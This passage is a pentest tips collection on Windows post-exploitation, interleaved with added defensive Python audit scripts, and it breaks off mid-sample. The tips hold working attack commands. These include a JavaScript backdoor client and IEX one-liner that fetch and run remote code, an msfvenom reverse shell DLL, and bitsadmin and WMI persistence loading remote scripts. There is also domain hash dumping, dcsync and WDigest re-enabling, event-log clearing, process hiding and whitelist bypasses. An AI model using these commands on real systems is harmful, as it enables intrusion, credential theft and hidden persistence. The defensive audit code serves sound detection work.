A collection of pentest and development tips
Author: 3gstudent
The following techniques should not be used for illegal purposes.
Nmap's -sV can detect the service version, but in some cases the service must be identified manually to verify the result.
Capturing the response packets with Wireshark is far less simple than using nc.
Eg.
For port 8001, use nc to connect to the port and then enter a random string. You'll get the following result:
```
$ nc -vv localhost 8001
localhost [127.0.0.1] 8001 (?) open
asd
HTTP/1.1 400 Bad Request
Date: Fri, 25 Aug 2017 12:15:25 GMT
Server: Apache/2.4.23 (Debian)
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.23 (Debian) Server at 127.0.0.1 Port 8001</address>
</body></html>
```
From this we know it is an HTTP service: the string we sent is not a valid HTTP request, so the server answers 400 Bad Request. The Server header also tells us the operating system is Debian and the web server is Apache.
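The same reasoning done in Python, as an added example that is not part of the original page: fingerprint_http_banner parses a raw reply the way the text reads the nc output above, separating the status line from the Server header, and returns None when the port answered but is not speaking HTTP; grab_banner does what the nc session does by hand (connect, send a junk line, read what comes back). SAMPLE_RESPONSE is constructed to match the capture above, and all function names are the example's own.

```python
import re
import socket
from typing import Optional

# Constructed sample: the reply an Apache server sends after the junk line
# "asd", matching the nc capture above (body truncated).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Date: Fri, 25 Aug 2017 12:15:25 GMT\r\n"
    b"Server: Apache/2.4.23 (Debian)\r\n"
    b"Content-Length: 301\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"\r\n"
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n'
)

STATUS_LINE = re.compile(rb"^HTTP/(\d\.\d) (\d{3})(?: (.*))?$")
# product[/version][ (comment)] is the usual shape of a Server header token
SERVER_TOKEN = re.compile(r"^([^/\s]+)(?:/(\S+))?(?:\s*\(([^)]*)\))?")


def fingerprint_http_banner(raw: bytes) -> Optional[dict]:
    """Pull protocol, status and Server details out of a raw reply.

    Returns None when the first line is not an HTTP status line, i.e. the
    port answered but is not speaking HTTP.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    m = STATUS_LINE.match(lines[0])
    if not m:
        return None
    info = {
        "protocol": "HTTP/" + m.group(1).decode("ascii"),
        "status": int(m.group(2)),
        "server": None,
        "version": None,
        "os_hint": None,
    }
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"server":
            s = SERVER_TOKEN.match(value.strip().decode("latin-1"))
            if s:
                info["server"], info["version"], info["os_hint"] = s.groups()
    return info


def grab_banner(host: str, port: int, probe: bytes = b"asd\r\n", timeout: float = 3.0) -> bytes:
    """What the nc session above does by hand: connect, send a junk line, read the reply."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(probe)
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    print(fingerprint_http_banner(SAMPLE_RESPONSE))
```

The Server header is whatever the administrator chose to send (Apache's ServerTokens directive can shorten it to just "Apache"), so the os_hint is a hint and not proof; the 400 status for a non-HTTP probe is the more reliable signal that the port speaks HTTP.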
Reference:
Kali:
python -m SimpleHTTPServer 80
Windows:
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
Reference:
Add user:
net user test test /add
net localgroup administrators test /add
Modify the registry to support remote connections:
reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
IPC connection:
net use \\192.168.1.195 test /u:test
Get a list of evtx log categories:
wevtutil el >1.txt
Get statistics for a single evtx log category:
Eg.
wevtutil gli "windows powershell"
Output:
creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
View the specific content of the specified evtx log:
wevtutil qe /f:text "windows powershell"
Find the specified amount of log content:
wevtutil qe /f:text "windows powershell" /c:20
Delete all information for a single log category:
wevtutil cl "windows powershell"
Reference:
Remove individual lines from Windows XML Event Log (EVTX) files:
The thread that implements the logging function is terminated by calling TerminateThread, which disables logging, but the Windows Event Log service is not destroyed and its state is still Running.
Powershell:
https://github.com/hlldz/Invoke-Phant0m
C++:
https://github.com/3gstudent/Windwos-EventLog-Bypass
Reference:
《利用API-NtQueryInformationThread和I_QueryTagInformation实现对Windwos日志监控的绕过》 (Using the NtQueryInformationThread and I_QueryTagInformation APIs to bypass Windows event log monitoring)
Use global APIhooks to modify the registry.
Download project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz
Modify the code to specify the program name to hide (cldr.exe), compile it into cldr.dll, and place cldr.dll in C:\ProgramData\Microsoft\HelpLibrary\
Administrator privileges:
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
At this point cldr.exe does not appear in the Task Manager process list, in Process Explorer, or in the output of tasklist.exe.
For 64-bit systems:
Administrator privileges:
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldrx64.dll" /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
Reference:
《利用globalAPIhooks在Win7系统下隐藏进程》 (Using global API hooks to hide a process on Windows 7)
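A defender's check for the registry changes made in this section and in the earlier "Modify the registry to support remote connections" step, as an added example that is not code from the page or from the AppInitGlobalHooks-Mimikatz project. audit_registry takes a snapshot dict ({key: {value name: data}}, constructed here to mirror the reg add commands above) and reports LocalAccountTokenFilterPolicy=1 and any AppInit_DLLs entry that is actually active (LoadAppInit_DLLs=1 with a non-empty list), noting whether RequireSignedAppInit_DLLs is enforced and whether the DLL lives outside %SystemRoot%. The key paths are those from the commands; the snapshot and function names are the example's own. On a live host the snapshot would be filled from reg query or Get-ItemProperty.

```python
from typing import Dict, List

# Keys the reg add commands on the page write to (HKLM view, 64-bit host).
POLICIES_SYSTEM = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
APPINIT_KEYS = (
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",
    r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows",
)

# Constructed snapshot {key: {value_name: data}} as the registry would look
# after the page's commands ran on a 64-bit system.
SNAPSHOT_AFTER_PAGE = {
    POLICIES_SYSTEM: {"LocalAccountTokenFilterPolicy": 1},
    APPINIT_KEYS[0]: {
        "RequireSignedAppInit_DLLs": 0,
        "LoadAppInit_DLLs": 1,
        "AppInit_DLLs": r"C:\ProgramData\Microsoft\HelpLibrary\cldrx64.dll",
    },
    APPINIT_KEYS[1]: {
        "RequireSignedAppInit_DLLs": 0,
        "LoadAppInit_DLLs": 1,
        "AppInit_DLLs": r"C:\ProgramData\Microsoft\HelpLibrary\cldr.dll",
    },
}


def audit_registry(snapshot: Dict[str, Dict[str, object]]) -> List[str]:
    """One finding per weakened setting; an empty list means nothing to report."""
    findings = []
    policies = snapshot.get(POLICIES_SYSTEM, {})
    if policies.get("LocalAccountTokenFilterPolicy") == 1:
        findings.append(
            "LocalAccountTokenFilterPolicy=1: local administrator accounts receive a "
            "full, unfiltered token over the network, so remote admin logons such as "
            "the IPC connection on the page succeed"
        )
    for key in APPINIT_KEYS:
        values = snapshot.get(key, {})
        # AppInit_DLLs is a space- or comma-separated list of DLL paths
        dlls = str(values.get("AppInit_DLLs", "")).replace(",", " ").split()
        if values.get("LoadAppInit_DLLs") != 1 or not dlls:
            continue
        # The OS default for RequireSignedAppInit_DLLs differs by edition;
        # an absent value is treated here as "not enforced"
        signed = values.get("RequireSignedAppInit_DLLs", 0) == 1
        for dll in dlls:
            location = "under" if dll.lower().startswith(r"c:\windows") else "outside"
            findings.append(
                f"{key}: AppInit_DLLs injects {dll} ({location} %SystemRoot%) into every "
                f"process that loads user32.dll; signature requirement {'on' if signed else 'OFF'}"
            )
    return findings


if __name__ == "__main__":
    for finding in audit_registry(SNAPSHOT_AFTER_PAGE):
        print("[!]", finding)
```

On Windows 8 and later with Secure Boot enabled the AppInit_DLLs mechanism is disabled altogether, which is why this technique is described for Windows 7; on 64-bit hosts both the native key and the Wow6432Node key have to be checked, as the 64-bit commands above write to both.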
If a directory contains both an exe and a com file with the same name, such as test.exe and test.com, and you enter test (without the file suffix) on the command line, the com file is run first.
To generate the COM file, just change the suffix of the exe file to com.
Reference:
《A dirty way of tricking users to bypass UAC》
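How cmd.exe picks test.com over test.exe, and how to find such pairs, as an added example that is not from the page: resolve_command applies the default PATHEXT order (a known Windows default, listed in the code) to a directory listing, and find_shadowed_exes reports every .com/.exe pair sharing a stem, which is the check to run over each directory on PATH. SAMPLE_LISTING is constructed.

```python
import os
from typing import List, Optional, Tuple

# Default PATHEXT order on Windows: when a command is typed without an
# extension, cmd.exe tries these in order within each directory it searches,
# so test.com is chosen before test.exe in the same directory.
DEFAULT_PATHEXT = [".COM", ".EXE", ".BAT", ".CMD", ".VBS", ".VBE",
                   ".JS", ".JSE", ".WSF", ".WSH", ".MSC"]

# Constructed listing of a directory that is on PATH
SAMPLE_LISTING = ["test.exe", "test.com", "tool.exe", "README.txt"]


def resolve_command(name: str, listing: List[str],
                    pathext: List[str] = DEFAULT_PATHEXT) -> Optional[str]:
    """Which file in `listing` runs when `name` is typed without an extension?"""
    by_lower = {f.lower(): f for f in listing}
    for ext in pathext:
        hit = by_lower.get((name + ext).lower())
        if hit is not None:
            return hit
    return None


def find_shadowed_exes(listing: List[str]) -> List[Tuple[str, str]]:
    """Pairs (com, exe) where the .com file would run instead of the .exe."""
    by_stem = {}
    for f in listing:
        stem, ext = os.path.splitext(f)
        by_stem.setdefault(stem.lower(), {})[ext.lower()] = f
    return [(exts[".com"], exts[".exe"])
            for exts in by_stem.values() if ".com" in exts and ".exe" in exts]


def scan_directory(path: str) -> List[Tuple[str, str]]:
    """Run the same check against a real directory, e.g. each entry of PATH."""
    return find_shadowed_exes(os.listdir(path))


if __name__ == "__main__":
    print(resolve_command("test", SAMPLE_LISTING))   # test.com
    print(find_shadowed_exes(SAMPLE_LISTING))
```

Typing the full name with its extension (test.exe) sidesteps the precedence rule, which is why scripts and scheduled tasks should always call binaries by full path and extension.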
Certificate generation and signature:
makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
cert2spc Root.cer Root.spc
pvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f
signtool sign /f Root.pfx /p 12345678password test.exe
It will generate four files: Root.cer, Root.pfx, Root.pvk, and Root.spc, and test.exe will be digitally signed.
Certificate registration:
Add the certificate to LocalMachine (administrator privileges):
certmgr.exe -add -c Root.cer -s -r localmachine root
Reference:
《A dirty way of tricking users to bypass UAC》
test.hta:
```
<HTML>
<HEAD>
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
Connect="powershell -nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA=="
WshShell.Run Connect, 4, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD>
<BODY>
</BODY>
</HTML>
```
Reference:
《Bypass McAfee Application Control——Code Execution》
By default C# cannot declare exported functions, but this can be implemented by adding UnmanagedExports.
Of course, DLLs written in C# need the corresponding version of the .NET runtime; DLLs written in C++ are more general.
The DLL can be loaded by rundll32.exe or regsvr32, but it must contain the specific export function.
Reference:
《Code Execution of Regsvr32.exe》
Essentially a DLL file with the cpl suffix and an export function CPLApplet.
Five methods of implementation:
(1) Double click to run directly
(2) cmd
rundll32 shell32.dll,Control_RunDLL test.cpl
(3) cmd
control test.cpl
(4) vbs
Dim obj
Set obj = CreateObject("Shell.Application")
obj.ControlPanelItem("test.cpl")
(5) js
var a = new ActiveXObject("Shell.Application");
a.ControlPanelItem("c:\\test\\test.cpl");
Reference:
《CPL文件利用介绍》 (An introduction to exploiting CPL files)
Server:
https://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1
Client:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Of course, the RAT tool can also be loaded by:
- vbs
- js
- exe
- dll
- shellcode
Reference:
《JavaScript Backdoor》
《JavaScript Phishing》
Applies to both Windows and Linux
Reference:
《Memory Dump利用实例》 (Worked examples of using memory dumps)
Visual C++:
- Modify the .vcxproj file
Visual Basic:
- Modify the .vbproj file
Visual F#:
- Modify the .fsproj file
Arbitrary code can be executed when any of the above project types is built with Visual Studio
Reference:
《Pay close attention to your download code——Visual Studio trick to run code when building》
Tips 15. When a 32-bit program runs on a 64-bit Windows system, its registry and file operations are redirected.
For registry operations:
The actual path to access HKLM\Software\ is HKLM\Software\Wow6432Node\
For file operations:
The actual path to access c:\windows\Sysnative\ is c:\windows\system32
The actual path to access c:\windows\system32\ is c:\windows\SysWOW64\
Reference:
《关于32位程序在64位系统下运行中需要注意的重定向问题》 (Redirection issues to watch for when running 32-bit programs on 64-bit systems)
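The redirection rules above as two small functions, as an added example that is not from the page or the referenced article, so that a path read from a 32-bit tool's log or configuration can be mapped to what was really touched. wow64_registry_view handles HKLM\SOFTWARE and leaves other hives alone; wow64_file_view handles System32 and the Sysnative escape hatch. It assumes the default C:\Windows system root and does not model the exceptions (shared registry subkeys such as parts of HKLM\SOFTWARE\Classes, or System32 subfolders like drivers\etc that are not redirected).

```python
import re

WINDIR = r"C:\Windows"  # assumption: default system root


def _under(path_lower: str, prefix_lower: str) -> bool:
    """True when path is prefix itself or something below it."""
    return path_lower == prefix_lower or path_lower.startswith(prefix_lower + "\\")


def wow64_registry_view(path: str) -> str:
    """Key a 32-bit process really opens when it asks for a path under HKLM\\SOFTWARE."""
    m = re.match(r"^(HKLM|HKEY_LOCAL_MACHINE)\\(SOFTWARE)(\\.*)?$", path, re.I)
    if not m:
        return path  # only HKLM\SOFTWARE is redirected by this rule
    hive, software, rest = m.group(1), m.group(2), m.group(3) or ""
    if re.match(r"^\\Wow6432Node(\\|$)", rest, re.I):
        return path  # already addressed through the 32-bit view
    return f"{hive}\\{software}\\Wow6432Node{rest}"


def wow64_file_view(path: str) -> str:
    """File a 32-bit process really opens for System32 / Sysnative requests."""
    low = path.lower()
    system32 = (WINDIR + r"\System32").lower()
    sysnative = (WINDIR + r"\Sysnative").lower()
    if _under(low, sysnative):
        # Sysnative is the escape hatch: it resolves to the real 64-bit System32
        return WINDIR + r"\System32" + path[len(sysnative):]
    if _under(low, system32):
        return WINDIR + r"\SysWOW64" + path[len(system32):]
    return path


if __name__ == "__main__":
    print(wow64_registry_view(r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows"))
    print(wow64_file_view(r"c:\windows\system32\cmd.exe"))
    print(wow64_file_view(r"c:\windows\Sysnative\cmd.exe"))
```

This is also why the 64-bit AppInit_DLLs commands earlier on the page write to both the native key and the Wow6432Node key: a 32-bit process only ever consults the latter.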
Copy ntds.dit:
Use NinjaCopy, https://github.com/3gstudent/NinjaCopy (Author: Joe Bialek, Twitter: @JosephBialek)
Dump hash:
Use quarkspwdump, https://github.com/quarkslab/quarkspwdump
esentutl /p /o ntds.dit
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt
Use DSInternals PowerShell Module, https://www.dsinternals.com/wp-content/uploads/DSInternals_v2.8.zip
Applicable conditions:
Windows PowerShell 3.0 or later
.NET Framework 4.0 or later
Reference:
《导出当前域内所有用户hash的技术整理》 (A summary of techniques for dumping the hashes of all users in the current domain)
《利用Powershell快速导出域控所有用户Hash》 (Quickly dumping all user hashes from a domain controller with PowerShell)
mimikatz:
mimikatz.exe "lsadump::dcsync /domain:test.local /all /csv" exit
Windows Server 2012 cannot use mimikatz to export clear-text passwords by default, and the same is true of some Windows Server 2008 systems.
Workaround: enable WDigest authentication
cmd:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
or
powershell:
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
After a restart or a new user logon, the clear-text password can be exported
Reference:
《域渗透——Dump Clear-Text Password after KB2871997 installed》 (Domain penetration: Dump Clear-Text Password after KB2871997 installed)
Tips 18. The new password of a domain controller can be recorded in real time by hooking PasswordChangeNotify.
Of course, you can choose to save it locally or upload the password to a server.
Reference:
《域渗透——Hook PasswordChangeNotify》 (Domain penetration: Hook PasswordChangeNotify)
If the administrator overlooks that hosts in the domain use the same local administrator account, you can log in remotely to other hosts in the domain via pass-the-hash.
Reference:
《域渗透——Local Administrator Password Solution》 (Domain penetration: Local Administrator Password Solution)
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-Exports.ps1
Get-Exports -DllPath c:\Windows\system32\dimsjob.dll -ExportsToCpp C:\test\export.txt
Reference:
《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》
Put the payload after 260 null characters so that it cannot be seen in the file's Properties dialog. This can be used to hide the payload in a shortcut, trick the user into clicking it, and conceal the code that is executed.
Reference:
POC:
https://github.com/3gstudent/CreateRemoteThread/blob/master/CreateRemoteThread32to64.cpp
Reference:
Processes running with SYSTEM permissions may run into the following issues:
- They cannot get the current user's file content; for example, the user's screen cannot be captured
- The environment variables are different
Therefore the rights need to be lowered to those of the current user
https://github.com/3gstudent/From-System-authority-to-Medium-authority
Reference:
Running msdtc will load oci.dll with SYSTEM privileges; if you execute msdtc -install from an administrator-privileged cmd, it will start calc.exe with high privileges.
Reference:
《Use msdtc to maintain persistence》
Tips 24. WinPcap can be installed on Windows from the command line, so nmap and Masscan can be run on a host you already control
Reference:
《渗透技巧——Windows平台运行Masscan和Nmap》 (Penetration tips: running Masscan and Nmap on Windows)
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
Reference:
《利用白名单绕过360实例》 (An example of bypassing 360 using whitelisted binaries)
《利用白名单绕过限制的更多测试》 (More tests on bypassing restrictions using whitelisted binaries)
Encapsulate mimikatz into a dll and run mimikatz via regsvr32, passing in the parameters
rundll32 katz.dll,EntryPoint log coffee exit
Reference:
《Code Execution of Regsvr32.exe》
Download the xml file and save it as a.xml:
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml
cmd:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe executes a.xml
Reference:
"C:\Program Files (x86)\MSBuild\14.0\Bin\csi.exe" c:\test\katz.csx
Reference:
https://gist.github.com/subTee/5c636b8736530fb20c3d
https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f
Reference:
Save:
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('Command' , $Payload)
$StaticClass.Put()
Read:
$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value
Reference:
《WMI Backdoor》
Use a flaw in the file hash algorithm to hide the payload in a PE file without affecting the PE file's digital signature.
Reference:
(1) ...
type putty.exe > ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe
(2) Special COM files
type putty.exe > \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe
(3) Disk root directory
type putty.exe >C:\:putty.exe
wmic process call create C:\:putty.exe
Reference:
《Hidden Alternative Data Streams的进阶利用技巧》 (Advanced techniques for exploiting hidden Alternate Data Streams)
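A classifier for stream paths of the three shapes shown above, as they would appear in a Sysmon Event ID 15 (FileCreateStreamHash) record or in dir /R output; this is an added example and not code from the page or the referenced article. split_stream_path separates the host file from the stream name (ignoring the drive colon and a trailing :$DATA type), and classify_stream_path reports the dot-only directory, reserved device name, drive-root and \\.\ device-namespace tricks, plus executable content in a stream. The sample paths follow the page's shapes; the names are the example's own.

```python
import re
from typing import List, Tuple

RESERVED_DEVICE_NAMES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)
DEVICE_PREFIX = "\\\\.\\"


def split_stream_path(path: str) -> Tuple[str, str]:
    """Split 'file:stream[:$DATA]' into (file path, stream name).

    The stream name is '' when the path carries no alternate stream; the drive
    colon (index 1) is never taken as a stream separator.
    """
    p = path[len(DEVICE_PREFIX):] if path.startswith(DEVICE_PREFIX) else path
    p = re.sub(r":\$DATA$", "", p, flags=re.I)
    idx = p.rfind(":")
    if idx <= 1:
        return p, ""
    return p[:idx], p[idx + 1:]


def classify_stream_path(path: str) -> List[str]:
    """Reasons a stream path deserves a look; an empty list means nothing unusual."""
    host, stream = split_stream_path(path)
    if not stream:
        return []
    reasons = []
    if path.startswith(DEVICE_PREFIX):
        reasons.append("opened through the \\\\.\\ device namespace")
    if re.fullmatch(r"[A-Za-z]:\\?", host):
        reasons.append("stream attached to the drive root directory")
    else:
        leaf = host.rstrip("\\").rsplit("\\", 1)[-1]
        if leaf and set(leaf) == {"."}:
            reasons.append("host directory named only with dots")
        if leaf.upper().split(".")[0] in RESERVED_DEVICE_NAMES:
            reasons.append(f"host named after reserved device {leaf.upper()}")
    if stream.lower().endswith((".exe", ".dll", ".scr", ".ps1", ".bat", ".cmd")):
        reasons.append(f"executable content in stream '{stream}'")
    return reasons


if __name__ == "__main__":
    for sample in (r"c:\test\ads\...:putty.exe",
                   r"\\.\C:\test\ads\COM1:putty.exe",
                   r"C:\:putty.exe",
                   r"c:\test\notes.txt"):
        print(sample, "->", classify_stream_path(sample))
```

Ordinary directory listings never show streams, so the inputs for this check have to come from a source that does: dir /R, Get-Item -Stream * in PowerShell, or the Sysmon stream-creation event.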
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list
The administrator may use WMI to record the attacker's WMI calls, which can be viewed with wmic. Of course, the monitoring can also be disabled with wmic.
Reference:
《Study Notes Weekly No.1(Monitor WMI & ExportsToC++ & Use DiskCleanup bypass UAC))》
wmic /node:192.168.1.10 /user:"administrator" /password:"123456" /NAMESPACE:"\\root\CIMV2" PATH Win32_OperatingSystem get CSName
msf:
msfvenom -p windows/meterpreter/reverse_http -f dll LHOST=192.168.174.133 LPORT=8080>./a.dll
Generate a.dll and upload it to the host, then execute:
rundll32.exe a.dll,Control_RunDLL
https://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp
Generate the dll, rename it to cpl, and double-click to execute
rundll32 a.dll,EntryPoint
regsvr32 a.dll
Reference:
《Code Execution of Regsvr32.exe》
odbcconf.exe /a {regsvr c:\test\odbcconf.dll}
Reference:
《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》
Tracker.exe /d test.dll /c svchost.exe
Tracker.exe carries a Microsoft digital signature, which bypasses application whitelist restrictions
Reference:
Prerequisite: Microsoft Office software is installed
1.rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\test\\messagebox.dll');this.close();
2.js
var excel = new ActiveXObject("Excel.Application");
excel.RegisterXLL("C:\\test\\messagebox.dll");
3.powershell
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL("C:\test\messagebox.dll")
Reference:
《Use Excel.Application object's RegisterXLL() method to load dll》
Copy xwizard.exe from %windir%\system32\ to the new directory C:\x.
Rename msg.dll to xwizards.dll and save it at C:\x.
Command line execution:
xwizard processXMLFile 1.txt
It will load C:\x\xwizards.dll.
Reference:
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
bitsadmin /Resume backdoor
Reference:
《Use bitsadmin to maintain persistence and bypass Autoruns》
```
pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP1";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 1";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consP1";
ScriptingEngine = "JScript";
ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
```
Administrator privileges:
mofcomp test.mof
Reference:
《WSC、JSRAT and WMI Backdoor》
Execute notepad.exe every 60 seconds
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
Reference:
《Study Notes of WMI Persistence using wmic.exe》
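An added example serving the three WMI passages above (the wmic enumeration of root\subscription, the MOF registered with mofcomp, and the wmic CREATE lines); it is not code from the page or from the referenced articles. parse_wmic_list reads /FORMAT:list output (Key=Value blocks separated by blank lines), and audit_subscriptions resolves every __FilterToConsumerBinding to its filter query and consumer action, skipping only the SCM Event Log binding that Windows ships with. The three text blocks are constructed to look like the output of the page's commands with Name, Query, ScriptText and similar properties requested instead of __RELPATH; the script: URL in the sample is a placeholder.

```python
import re
from typing import Dict, List

# Constructed output of wmic ... PATH __EventFilter GET Name,Query /FORMAT:list
FILTERS_TXT = """
Name=SCM Event Log Filter
Query=select * from MSFT_SCMEventLogEvent


Name=filtP1
Query=Select * From __InstanceModificationEvent Where TargetInstance Isa "Win32_LocalTime" And TargetInstance.Second = 1


Name=BotFilter82
Query=SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
"""

# Constructed output for the consumer classes (script: URL is a placeholder)
CONSUMERS_TXT = r"""
__CLASS=NTEventLogEventConsumer
Name=SCM Event Log Consumer


__CLASS=ActiveScriptEventConsumer
Name=consP1
ScriptingEngine=JScript
ScriptText=GetObject("script:https://example.invalid/placeholder")


__CLASS=CommandLineEventConsumer
Name=BotConsumer23
ExecutablePath=C:\Windows\System32\notepad.exe
CommandLineTemplate=C:\Windows\System32\notepad.exe
"""

# Constructed output of wmic ... PATH __FilterToConsumerBinding GET Filter,Consumer /FORMAT:list
BINDINGS_TXT = r"""
Consumer=NTEventLogEventConsumer.Name="SCM Event Log Consumer"
Filter=__EventFilter.Name="SCM Event Log Filter"


Consumer=ActiveScriptEventConsumer.Name="consP1"
Filter=__EventFilter.Name="filtP1"


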